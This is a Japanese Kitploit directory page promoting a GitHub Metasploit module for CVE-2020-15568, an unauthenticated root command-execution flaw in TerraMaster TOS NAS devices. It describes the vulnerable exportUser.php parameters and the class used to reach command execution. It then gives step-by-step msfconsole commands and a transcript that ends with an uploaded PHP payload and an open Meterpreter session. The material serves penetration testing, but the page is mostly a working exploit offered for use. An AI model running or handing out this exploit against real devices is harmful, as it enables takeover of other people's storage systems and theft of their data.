Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
TerraMaster-TOS-CVE-2020-15568 — CVE-2020-15568 Metasploitモジュールのリポジトリ | Kitploit
ツール/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

CVE-2020-15568 Metasploitモジュールのリポジトリ

リポジトリを見る
333年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

TerraMaster TOS CVE-2020-15568

CVE-2020-15568 Metasploitモジュール用リポジトリ

脆弱なアプリケーション

説明

include/exportUser.php ファイルに動的クラスメソッド呼び出しの脆弱性が存在し、TerraMaster デバイス上で root 権限によるリモートコマンド実行を引き起こす可能性があります。 脆弱性のあるファイルは、メソッド呼び出しに到達してこの脆弱性を悪用するために、複数の HTTP GET パラメータを指定する必要があります。最初の行でアプリケーションは app.php をインクルードし、これが TOS ソフトウェアの関連コアクラスをオートロードします。 アプリケーションは GET パラメータ type の値に基づいて操作を決定します。type 変数の値が 1 または 2 以外の場合、脆弱なコードに到達することが可能です。 exportUser.php のソースコードでは、アプリケーションは HTTP GET パラメータとして cla(class の略)、func、opt を必要とします。

他のファイルのコードレビュー中にも、TOS ソフトウェアに既存のクラスを使用してこの問題を悪用する方法があることが判明しました。 include/class/application.class.php にある PHP クラスは、TOS ソフトウェアを実行するデバイス上でコマンドを実行するための最適な候補です。 exportUser.php には認証制御がないため、認証されていない攻撃者がコード実行に到達することが可能です。

検証手順

  1. TOS バージョン 4.1.24 以下で TerraMaster NAS をセットアップする
  2. msfconsole を起動する
  3. 実行: use exploit/multi/http/terramaster_command_exec
  4. 実行 set rhost 192.168.1.27
  5. 実行: check
root@kitploit:~
[+] 192.168.1.27:80 - The target is vulnerable.

ターゲット

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

シナリオ

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter > 
ツールをダウンロード